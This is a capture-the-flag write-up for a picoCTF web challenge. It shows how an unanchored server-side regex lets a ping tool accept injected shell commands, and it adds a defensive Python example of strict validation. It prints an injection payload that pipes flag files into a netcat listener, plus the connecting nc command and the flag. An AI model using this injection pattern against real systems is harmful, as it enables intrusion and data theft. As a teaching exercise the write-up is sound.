Points: 400
Web Exploitation
One of my schoolmates developed an alive monitoring tool. Can you get a flag from http://2018shell1.picoctf.com:31070?
This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate.
You should be able to listen through the shell on the server.
Looking at the PHP source code, we can see that the regex on the server side is missing the trailing $ anchor. Because the pattern only has to match at the start of the input, we can append any shell command after the IP address and it still passes the check.
There is also client-side JavaScript validation, but we can bypass it by sending the request directly from Python.
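To show why the missing $ matters and what a proper server-side check looks like, here is an added Python example; it is not the challenge's PHP source or the author's solve.py, and its regex is an assumed approximation of the vulnerable pattern, not the one from the page. It runs the unanchored check and an anchored, fully parsed check over constructed inputs (including the injected command string used in this writeup) and shows the safe way to hand a validated address to ping: an argv list with no shell involved.

```python
import ipaddress
import re

# Constructed approximation of the challenge's server-side check: the
# pattern covers the dotted-quad shape but is not anchored at the end.
WEAK_IP_RE = re.compile(r"^(\d{1,3}\.){3}\d{1,3}")

# Same shape, used with fullmatch so both ends are anchored. This also
# avoids the quirk that $ matches before a trailing newline, which Python
# shares with PCRE (PHP needs the D modifier or \z for strict end-of-string).
STRICT_IP_RE = re.compile(r"(\d{1,3}\.){3}\d{1,3}")

# Constructed sample inputs, including the payload shape from the writeup.
SAMPLE_INPUTS = [
    "8.8.8.8",
    "8.8.8.8; cat *flag* | nc -lp 54433",
    "8.8.8.8\n",
    "999.1.1.1",
]


def weak_check(value: str) -> bool:
    """Mirror the unanchored check: anything after the IP is ignored."""
    return WEAK_IP_RE.match(value) is not None


def strict_check(value: str) -> bool:
    """Anchored shape check plus a real IPv4 parse (rejects 999.1.1.1)."""
    if STRICT_IP_RE.fullmatch(value) is None:
        return False
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def build_ping_argv(value: str) -> list:
    """Validate, then return an argv list to run with subprocess and
    shell=False, so no shell ever parses the user-supplied string."""
    if not strict_check(value):
        raise ValueError("not a valid IPv4 address")
    return ["ping", "-c", "1", value]


def compare(values):
    """Return {input: (weak_accepts, strict_accepts)} for the given inputs."""
    return {v: (weak_check(v), strict_check(v)) for v in values}


if __name__ == "__main__":
    for value, verdict in compare(SAMPLE_INPUTS).items():
        print(repr(value), "weak=%s strict=%s" % verdict)
```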
All we have to do is append a netcat listener to the injected command and read the flag through it. In this case, I set the port to 54433. Piping the output of cat *flag* into the listener delivers the flag.
Exploit: 8.8.8.8; cat *flag* | nc -lp 54433
8.8.8.8 is used because that's the IP of Google's DNS. I used it just to speed up the process.
Finally, we connect to the server using netcat and get the flag:
nc 2018shell1.picoctf.com 54433
Working solution: solve.py
picoCTF{n3v3r_trust_a_b0x_91345b04}